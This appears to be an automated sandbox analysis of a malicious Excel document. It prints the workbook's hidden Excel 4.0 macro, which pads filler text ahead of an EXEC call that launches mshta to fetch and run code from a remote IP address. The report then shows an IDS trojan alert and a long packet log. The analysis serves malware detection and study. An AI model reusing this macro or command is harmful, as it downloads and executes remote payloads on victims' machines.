                                                                                                                                  General
                                                                                                                                  Stream Path:\x5DocumentSummaryInformation
                                                                                                                                  File Type:data
                                                                                                                                  Stream Size:4096
                                                                                                                                  Entropy:0.347239233907
                                                                                                                                  Base64 Encoded:False
                                                                                                                                  General
                                                                                                                                  Stream Path:\x5SummaryInformation
                                                                                                                                  File Type:data
                                                                                                                                  Stream Size:4096
                                                                                                                                  Entropy:0.263263729974
                                                                                                                                  Base64 Encoded:False
                                                                                                                                  General
                                                                                                                                  Stream Path:Workbook
                                                                                                                                  File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                  Stream Size:147373
                                                                                                                                  Entropy:7.45971048702
                                                                                                                                  Base64 Encoded:True
                                                                                                                                  Name:Macro1
                                                                                                                                  Type:3
                                                                                                                                  Final:False
                                                                                                                                  Visible:False
                                                                                                                                  Protected:False
                                                                                                                                  Macro1 3 False 0 False post
2,11,' Sex reached suppose our whether. Oh really by an manner sister so. One sportsman tolerably him extensive put she immediate. He abroad of cannot looked in. Continuing interested ten stimulated prosperous frequently all boisterous nay. Of oh really he extent horses wicket.
4,11,' Advice me cousin an spring of needed. Tell use paid law ever yet new. Meant to learn of vexed if style allow he there. Tiled man stand tears ten joy there terms any widen. Procuring continued suspicion its ten. Pursuit brother are had fifteen distant has. Early had add equal china quiet visit. Appear an manner as no limits either praise in. In in written on charmed justice is amiable farther besides. Law insensible middletons unsatiable for apartments boy delightful unreserved.
6,11,' And produce say the ten moments parties. Simple innate summer fat appear basket his desire joy. Outward clothes promise at gravity do excited. Sufficient particular impossible by reasonable oh expression is. Yet preference connection unpleasant yet melancholy but end appearance. And excellence partiality estimating terminated day everything.
7,11,' Debating me breeding be answered an he. Spoil event was words her off cause any. Tears woman which no is world miles woody. Wished be do mutual except in effect answer. Had boisterous friendship thoroughly cultivated son imprudence connection. Windows because concern sex its. Law allow saved views hills day ten. Examine waiting his evening day passage proceed.
8,11,' Sex reached suppose our whether. Oh really by an manner sister so. One sportsman tolerably him extensive put she immediate. He abroad of cannot looked in. Continuing interested ten stimulated prosperous frequently all boisterous nay. Of oh really he extent horses wicket.
10,11,' Advice me cousin an spring of needed. Tell use paid law ever yet new. Meant to learn of vexed if style allow he there. Tiled man stand tears ten joy there terms any widen. Procuring continued suspicion its ten. Pursuit brother are had fifteen distant has. Early had add equal china quiet visit. Appear an manner as no limits either praise in. In in written on charmed justice is amiable farther besides. Law insensible middletons unsatiable for apartments boy delightful unreserved.
12,11,' And produce say the ten moments parties. Simple innate summer fat appear basket his desire joy. Outward clothes promise at gravity do excited. Sufficient particular impossible by reasonable oh expression is. Yet preference connection unpleasant yet melancholy but end appearance. And excellence partiality estimating terminated day everything.
13,11,' Debating me breeding be answered an he. Spoil event was words her off cause any. Tears woman which no is world miles woody. Wished be do mutual except in effect answer. Had boisterous friendship thoroughly cultivated son imprudence connection. Windows because concern sex its. Law allow saved views hills day ten. Examine waiting his evening day passage proceed.
15,11,' Sudden she seeing garret far regard. By hardly it direct if pretty up regret. Ability thought enquire settled prudent you sir. Or easy knew sold on well come year. Something consulted age extremely end procuring. Collecting preference he inquietude projection me in by. So do of sufficient projecting an thoroughly uncommonly prosperous conviction. Pianoforte principles our unaffected not for astonished travelling are particular.
17,11,' By in no ecstatic wondered disposal my speaking. Direct wholly valley or uneasy it at really. Sir wish like said dull and need make. Sportsman one bed departure rapturous situation disposing his. Off say yet ample ten ought hence. Depending in newspaper an september do existence strangers. Total great saw water had mirth happy new. Projecting pianoforte no of partiality is on. Nay besides joy society him totally six.
20,11,=EXEC("cmd /c mshta http://91.240.118.168/zqqw/zaas/fe.html")
26,11,=HALT()
                                                                                                                                  Name:Macro1
                                                                                                                                  Type:3
                                                                                                                                  Final:False
                                                                                                                                  Visible:False
                                                                                                                                  Protected:False
                                                                                                                                  Macro1 3 False 0 False pre
2,11,' Sex reached suppose our whether. Oh really by an manner sister so. One sportsman tolerably him extensive put she immediate. He abroad of cannot looked in. Continuing interested ten stimulated prosperous frequently all boisterous nay. Of oh really he extent horses wicket.
4,11,' Advice me cousin an spring of needed. Tell use paid law ever yet new. Meant to learn of vexed if style allow he there. Tiled man stand tears ten joy there terms any widen. Procuring continued suspicion its ten. Pursuit brother are had fifteen distant has. Early had add equal china quiet visit. Appear an manner as no limits either praise in. In in written on charmed justice is amiable farther besides. Law insensible middletons unsatiable for apartments boy delightful unreserved.
6,11,' And produce say the ten moments parties. Simple innate summer fat appear basket his desire joy. Outward clothes promise at gravity do excited. Sufficient particular impossible by reasonable oh expression is. Yet preference connection unpleasant yet melancholy but end appearance. And excellence partiality estimating terminated day everything.
7,11,' Debating me breeding be answered an he. Spoil event was words her off cause any. Tears woman which no is world miles woody. Wished be do mutual except in effect answer. Had boisterous friendship thoroughly cultivated son imprudence connection. Windows because concern sex its. Law allow saved views hills day ten. Examine waiting his evening day passage proceed.
8,11,' Sex reached suppose our whether. Oh really by an manner sister so. One sportsman tolerably him extensive put she immediate. He abroad of cannot looked in. Continuing interested ten stimulated prosperous frequently all boisterous nay. Of oh really he extent horses wicket.
10,11,' Advice me cousin an spring of needed. Tell use paid law ever yet new. Meant to learn of vexed if style allow he there. Tiled man stand tears ten joy there terms any widen. Procuring continued suspicion its ten. Pursuit brother are had fifteen distant has. Early had add equal china quiet visit. Appear an manner as no limits either praise in. In in written on charmed justice is amiable farther besides. Law insensible middletons unsatiable for apartments boy delightful unreserved.
12,11,' And produce say the ten moments parties. Simple innate summer fat appear basket his desire joy. Outward clothes promise at gravity do excited. Sufficient particular impossible by reasonable oh expression is. Yet preference connection unpleasant yet melancholy but end appearance. And excellence partiality estimating terminated day everything.
13,11,' Debating me breeding be answered an he. Spoil event was words her off cause any. Tears woman which no is world miles woody. Wished be do mutual except in effect answer. Had boisterous friendship thoroughly cultivated son imprudence connection. Windows because concern sex its. Law allow saved views hills day ten. Examine waiting his evening day passage proceed.
15,11,' Sudden she seeing garret far regard. By hardly it direct if pretty up regret. Ability thought enquire settled prudent you sir. Or easy knew sold on well come year. Something consulted age extremely end procuring. Collecting preference he inquietude projection me in by. So do of sufficient projecting an thoroughly uncommonly prosperous conviction. Pianoforte principles our unaffected not for astonished travelling are particular.
17,11,' By in no ecstatic wondered disposal my speaking. Direct wholly valley or uneasy it at really. Sir wish like said dull and need make. Sportsman one bed departure rapturous situation disposing his. Off say yet ample ten ought hence. Depending in newspaper an september do existence strangers. Total great saw water had mirth happy new. Projecting pianoforte no of partiality is on. Nay besides joy society him totally six.
20,11,=EXEC("cmd /c mshta http://91.240.118.168/zqqw/zaas/fe.html")
26,11,=HALT()
                                                                                                                                  Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                  01/28/22-21:04:46.790335 | TCP | 2034631 | ET TROJAN Maldoc Activity (set) | 49166 | 80 | 192.168.2.22 | 91.240.118.168
                                                                                                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                  Jan 28, 2022 21:04:51.355396986 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.355413914 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.355494976 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.355583906 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.355628014 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.355643988 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.355777025 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.356023073 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.356040955 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.356057882 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.356074095 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.356077909 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.356092930 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.356101990 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.356112003 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.356152058 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.356158018 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.356249094 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.356266022 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.356307983 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.357264042 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.357290030 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.357306004 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.357321978 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.357372046 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.362349987 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.362375975 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.362389088 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.362401962 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.362415075 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.362426996 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.362440109 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.362456083 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.362467051 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.362483025 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.362483978 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.362495899 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.362504005 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.362508059 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.362509966 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.362546921 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.362596989 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.363506079 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.363533020 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.363544941 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.363601923 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.363678932 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.367794991 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.367818117 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.629568100 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.629717112 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.629734993 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.629786968 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.629875898 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.629945993 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.661187887 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.661216021 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.661232948 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.661267042 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.661317110 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.661370993 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.661395073 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.661412954 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.661427021 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.661442995 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.661454916 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.661458015 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.661474943 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.661492109 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.661555052 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.662337065 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.663602114 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.663665056 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.663676977 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.663742065 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.663796902 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.663877010 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.663894892 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.663929939 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.673650026 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.673705101 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.673722029 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.673758984 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.673768044 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.673787117 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.673806906 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.673836946 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.673877954 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.673896074 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.673908949 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.673922062 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.673923969 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.673933029 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.673939943 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.673958063 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.673966885 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.673974991 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.673993111 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.674001932 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.674011946 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.674029112 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.674030066 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.674046040 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.674063921 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.674072027 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.674082994 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.674099922 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.674099922 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.674114943 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.674135923 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.674196005 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.674225092 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.674237013 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.674261093 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.674278975 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.674293995 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.674297094 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.674312115 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.674328089 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.674330950 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.674390078 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.677716017 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.677730083 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.935740948 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.935774088 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.935834885 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.935846090 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.936026096 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.936078072 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.967017889 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.967044115 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.967076063 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.967103004 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.967103958 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.967135906 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.967150927 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.967395067 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.967427015 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.967438936 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.967463017 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548679113 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548693895 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548701048 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.548711061 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548727036 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548729897 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.548743963 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548759937 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548764944 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.548775911 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548791885 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548799992 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.548810005 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548825979 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548830986 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.548842907 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548857927 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548866034 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.548893929 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.581955910 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.581984043 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.581996918 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582012892 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582029104 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582043886 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582060099 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582076073 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582092047 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582102060 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.582108021 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582123995 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582134008 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.582139015 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.582140923 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582159042 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582160950 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.582175970 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582192898 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582195997 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.582210064 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582226038 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582227945 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.582243919 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582258940 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582263947 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.582276106 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582292080 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582293034 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.582308054 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582324982 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.582885027 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582904100 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582931995 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.582940102 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582958937 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582973957 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582977057 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.583009005 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.583018064 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.583035946 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.583053112 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.583067894 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.583070993 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.583097935 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.583100080 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.583116055 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.583148003 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.583223104 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.592597961 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.592695951 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.592717886 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.592719078 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.592740059 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.592756033 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.592763901 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.592787027 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.592806101 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.592808008 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.592829943 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.592844009 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.592850924 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.592911005 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.592999935 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.593004942 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.593041897 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.593046904 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.595520020 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.595552921 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.595582008 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.595608950 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.595608950 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.595628023 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.595639944 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.595665932 CET8049168103.138.189.128192.168.2.22
